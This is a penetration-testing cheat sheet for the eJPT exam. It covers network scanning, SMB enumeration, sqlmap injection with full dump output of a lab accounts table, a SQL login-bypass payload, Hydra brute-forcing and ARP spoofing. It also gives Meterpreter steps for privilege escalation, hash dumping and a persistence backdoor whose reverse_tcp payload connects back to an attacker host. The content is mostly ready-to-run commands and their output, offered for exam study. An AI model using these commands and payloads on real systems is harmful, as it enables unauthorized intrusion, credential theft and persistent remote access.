EJPT Cheat Sheet

All the commands you need to pass the Elearnsecurity Junior Penetration Tester (EJPT)

Routing

View the existing routes

route
ip route

Add new routes manually

ip route add ROUTETO via ROUTEFROM

example:

sudo ip route add 192.168.222.0/24 via 10.175.34.1

Enumeration and Scanning

Whois

Whois site

Ping Sweep

fping -a -g <ip-subnet/subnet mask> 2>/dev/null

example:

fping -a -g 192.168.222.0/24 2>/dev/null

Nmap

# OS Detection, no ping
nmap -Pn -O 10.10.10.10

# def scripts, version check
nmap -sC -sV 10.10.10.10

# above + All ports
nmap -sC -sV -p- 10.10.10.10

# UDP version check
nmap -sU -sV 10.10.10.10

#Syn scan, Version Scan, Os Detection, Aggressive,Port scan only.
sudo nmap -sS -sV -O -A -Pn 172.16.64.182,199 > nmap.txt

#checke for vulnerability using scripts
nmap --script=vuln -A  172.16.64.182,199 > nmap.txt

SMB/SAMBA

nbtscan

nbtscan -A 10.10.10.10

net view

net view 10.10.10.10

net use

# c$ - shares in c drive
# admin$ - windows install directory
# ipc$ - inter process use (not viewable on browser)

# using no user/pass login

net use \\10.10.10.10\IPC$ '' /u:''
# The command completed successfully.

net use \\10.10.10.10\ADMIN$ '' /u:
# System error 5 has occurred.

# Access is denied.

enum

# enumerate users
enum -U 10.10.10.10

# enumerate password policy
enum -P 10.10.10.10

nmblookup

nmblookup -A 10.10.10.10

smbclient

# no password mode -N
smbclient -L //10.10.10.10 -N

mysql

#Connecting database to site
mysql -u USERNAME -p PASSWORD -h HOST DB

#Selecting Database
use <db_name>

#viewing tables
show tables;

#select the tables
select * from <table_name>

┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p                                                                                                                           1 ⨯
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 465
Server version: 5.5.38-0+wheezy1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> use awdmgmt_accounts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts                   |
+----------------------------+
1 row in set (0.340 sec)

MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email              | password | displayname |
+----+--------------------+----------+-------------+
|  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
+----+--------------------+----------+-------------+

SQLi and Sqlmap

sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10  --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
#list databases
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs

#select database and list tables
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs 'database_name' --tables

#Dump specific database
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump 

# banner grabbing
sqlmap -u http://10.10.10.10/view.php?id=1 -b

# dump specified database
sqlmap -u http://10.10.10.10/view.php?id=1 --current-db selfie4you --dump

#sql login pages bypass
' or 1=1; -- -

kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs awd --tables
        ___
       __H__                                                                                                                                                           
 ___ ___[(]_____ ___ ___  {1.5.7#stable}                                                                                                                               
|_ -| . [']     | .'| . |                                                                                                                                              
|___|_  ["]_|_|_|__,|  _|                                                                                                                                              
      |_|V...       |_|   http://sqlmap.org                                                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:54:56 /2021-09-12/

[02:54:57] [INFO] resuming back-end DBMS 'mysql' 
[02:54:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=26 AND 8959=8959

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:54:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.4.4, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[02:54:58] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema

[02:54:59] [INFO] fetching tables for databases: 'awd, information_schema'
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: awd
[3 tables]
+---------------------------------------+
| accounts                              |
| awards                                |
| news                                  |
+---------------------------------------+

[02:55:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'

[*] ending @ 02:55:00 /2021-09-12/

┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump
        ___
       __H__                                                                                                                                                           
 ___ ___[(]_____ ___ ___  {1.5.7#stable}                                                                                                                               
|_ -| . [,]     | .'| . |                                                                                                                                              
|___|_  [)]_|_|_|__,|  _|                                                                                                                                              
      |_|V...       |_|   http://sqlmap.org                                                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:56:48 /2021-09-12/

[02:56:48] [INFO] resuming back-end DBMS 'mysql' 
[02:56:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=26 AND 8959=8959

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:56:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.12
[02:56:49] [INFO] fetching columns for table 'accounts' in database 'awd'
[02:56:51] [INFO] fetching entries for table 'accounts' in database 'awd'
Database: awd
Table: accounts
[11 entries]
+----+-----------------------------------------------------+-------------+-------------------+
| id | email                                               | password    | displayname       |
+----+-----------------------------------------------------+-------------+-------------------+
| 1  | admin@awdmgmt.labs                                  | S3cr3tBOFH  | Admin             |
| 2  | porta.elit.a@adipiscingMaurismolestie.net           | VUH74DYX6DO | Mallory Reed      |
| 3  | ipsum.leo.elementum@Phasellusfermentumconvallis.org | GUC97VHY8HK | Katell Stewart    |
| 4  | mauris.sit@torquent.edu                             | LPW27DSG6QE | Gemma Beck        |
| 5  | Praesent.interdum@ametrisus.org                     | TWS34ORL6GX | Fuller Casey      |
| 6  | Quisque.libero@Cum.ca                               | OSQ80TYZ6YW | Hu Miles          |
| 7  | tincidunt.Donec.vitae@tempuseuligula.com            | HOV82DUI9TF | Lacey Hawkins     |
| 8  | dignissim.Maecenas@estcongue.org                    | TEO38KNA2UZ | Kaden Singleton   |
| 9  | dictum@tempusrisusDonec.ca                          | LKK51JAO3PJ | Britanney Guzman  |
| 10 | blandit.viverra.Donec@Suspendisse.net               | PTS90MHF9XA | Aspen Byers       |
| 11 | ligula@mollisDuis.ca                                | PLN49WZU6IB | Alexandra Cabrera |
+----+-----------------------------------------------------+-------------+-------------------+

[02:56:52] [INFO] table 'awd.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.124.211.96/dump/awd/accounts.csv'
[02:56:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'

[*] ending @ 02:56:52 /2021-09-12/

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$

John for cracking

john -wordlist /path/to/wordlist -users=users.txt hashfile

Hydra

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10

SMB / SAMBA

nmblookup -A 10.10.10.10
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
enum4linux -a 10.10.10.10

ARP spoofing (Dsniff)

# tells my machine to forward packets incepted to the real desination hosts
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i <interface> -t <target> -r <host>
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

Metasploit

search x
use x
info
show options
show advanced

Meterpreter

background
sessions -l
sessions -i 1
sysinfo
ifconfig
route

# get which user is running process
getuid

# privilege escalation ('User Account Control' GPO policy may prevent this)
getsystem

# bypass the restriction of 'User Account Control' GPO policy to privesc
bypassuac

# transfering files
download x /root/
upload x C:\\Windows

# run standard operating system shell
shell


use post/windows/gather/hashdump

Meterpreter - persistence backdoor

# persistent backdoor - need meterpreter session
msf > use exploit/windows/local/s4u_persistence
msf (s4u_persistence) > set session 2
#session => 2
msf (s4u_persistence) > set trigger logon
#trigger => logon
msf (s4u_persistence) > set payload windows/meterpreter/reverse_tcp
msf (s4u_persistence) > set lhost 1.2.3.4
msf (s4u_persistence) > set lport 1234
msf (s4u_persistence) > exploit


msf (s4u_persistence) > use exploit/multi/handler
msf (handler) > set payload windows/meterpreter/reverse_tcp
msf (handler) > exploit

# once victim restarts and logons, we will get a meterpreter shell

Last updated 4 years ago

Was this helpful?